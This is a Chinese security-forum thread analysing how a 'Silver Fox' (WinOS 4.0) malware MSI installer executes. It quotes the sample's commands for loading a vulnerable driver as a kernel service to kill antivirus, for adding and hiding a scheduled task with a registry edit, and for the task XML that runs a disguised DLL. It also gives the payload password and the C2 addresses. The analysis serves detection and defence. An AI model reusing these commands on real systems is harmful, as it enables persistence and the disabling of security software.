银狐（WinOS 4.0）MSI执行流程

显示全部楼层 · 发表于 2024-10-12 19:58:29

本帖最后由 ANY.LNK 于 2024-10-13 01:17 编辑

银狐存在多个变种，本篇仅分析以“软件包安装.msi”为名的这批。

此样本已经出现过百个同类变种（@wwwab 提供），其结构和执行行为大同小异，选取典型代表之一（SHA256：AE384265AFDD4AEDC1A4AC51D5F0B14D56185CB06B14396F97B119DD390675EA、3CD74F2E7EA8EF36C4FB0ED096A433F9D6E4657DD68CEFCAD21D35617232FABE）进行分析

此类样本的MSI结构大体如下，关键载荷均使用7-Zip打包加密，增加了提取特征的难度，对于某些安全软件，可以直接让上报自动机拒绝处理

样本启动并通过UAC后，会逐步解密文件。

首先，将加密的文件释放到\Program Files (x86)\Windows NT目录下，并将文件设为系统隐藏属性

最先解压出的文件是tProtect.dll，这实际上是一个包含漏洞的可利用驱动（参见https://github.com/BlackSnufkin/BYOVD/tree/main/TfSysMon-Killer的POC），通过cmd将其注册为服务并启动

cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

复制代码

启动后，将不断搜寻杀毒软件进程并结束

随后注册并隐藏（参见：https://cloud.tencent.cn/developer/article/2377196，Windows使用注册表识别计划任务，而非XML）计划任务，用于后续的载荷解密和更新

cmd /c start schtasks /create /tn "Corp" /xml C:\Users\MICROS~1\AppData\Local\Temp\3EB7.tmp

复制代码

cmd /c start reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Corp" /v Index /t REG_DWORD /d 0 /f

复制代码

原始XML配置如下

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.6" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2005-10-11T13:21:17-08:00</Date>
<Author>Microsoft Corporation</Author>
<Version>1.0.0</Version>
<Description>Microsoft</Description>
<URI>\Corp</URI>
</RegistrationInfo>
<Triggers>
<LogonTrigger>
<Enabled>true</Enabled>
<UserId>Microsoft Defender</UserId>
</LogonTrigger>
</Triggers>
<Principals>
<Principal id="System">
<UserId>Microsoft Defender</UserId>
<RunLevel>HighestAvailable</RunLevel>
<LogonType>InteractiveToken</LogonType>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
<UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
<RestartOnFailure>
<Interval>PT1M</Interval>
<Count>3</Count>
</RestartOnFailure>
</Settings>
<Actions Context="System">
<Exec>
<Command>regsvr32.exe</Command>
<Arguments>"C:\Program Files (x86)\Windows NT\Update.png"</Arguments>
</Exec>
</Actions>
</Task>

复制代码

修改系统安全UAC配置，减少提示

注册的计划任务通过RegSvr32.exe加载解密出的Update.png，实际为DLL文件，被劫持的RegSvr32.exe会检查更新下载加密的文件（若没有，解密本地文件），稍后会启动cmd.exe调用7-Zip命令行用密码idyfiaseydv9281eyd2逐个解密文件，释放出最终载荷

除上述外，还有一个已签名的hotdog.exe和curl.dll，不过目前我未捕获到运行实例

winnt.exe通过TCP连接C2：47.242.184.38；runtime.exe通过UDP连接C2：111.180.189.230（目前推断同属于在前段时间攻击论坛的人）

显示全部楼层 · 发表于 5 天前

本帖最后由 ANY.LNK 于 2024-10-27 02:46 编辑

更新：hotdog.exe，curl.dll功能明晰

hotdog.exe用于Patch AMSI ETW等安全措施

curl.dll为Rootkit，用于保护与持久化（实际测试保护能力不强）

额外发现，在https://bbs.kafan.cn/thread-2275314-1-1.html中的样本中，最终payload也使用了计划任务进行持久化

显示全部楼层 · 发表于 2024-10-12 20:02:55

很高质量

显示全部楼层 · 发表于 2024-10-12 20:04:30

支持支持

显示全部楼层 · 发表于 2024-10-12 21:27:08

TX 立大功

显示全部楼层 · 发表于 2024-10-12 21:31:44

显示全部楼层 · 发表于 2024-10-13 01:23:37

支持

显示全部楼层 · 发表于 2024-10-13 10:10:51

都用winos4.0了攻击手法也不会高到哪里去无非就是加驱结束杀软然后无脑持久化

显示全部楼层 · 发表于 2024-10-13 14:26:58

高质量，支持

显示全部楼层 · 发表于 2024-10-13 22:30:37

本帖最后由 Luna_ovo 于 2024-10-13 22:32 编辑

没事了，我看成分析工具了...

这个执行的cmd命令和带负荷的7zip命令是怎么查看的?

显示全部楼层 · 发表于 2024-10-13 22:36:29

0殺神在心0 发表于 2024-10-13 10:10
都用winos4.0了攻击手法也不会高到哪里去无非就是加驱结束杀软然后无脑持久化

确实如此

不过这个样本吸引我的原因是所有测试的的沙箱都只抓到了msiexec.exe的行为就没有后续了，而不像其他的MSI（诸如FakeApp等）那样能抓到启动7-Zip或其他解压缩的的进程（

[原创分析] 银狐（WinOS 4.0）MSI执行流程

本帖子中包含更多资源

评分

本帖子中包含更多资源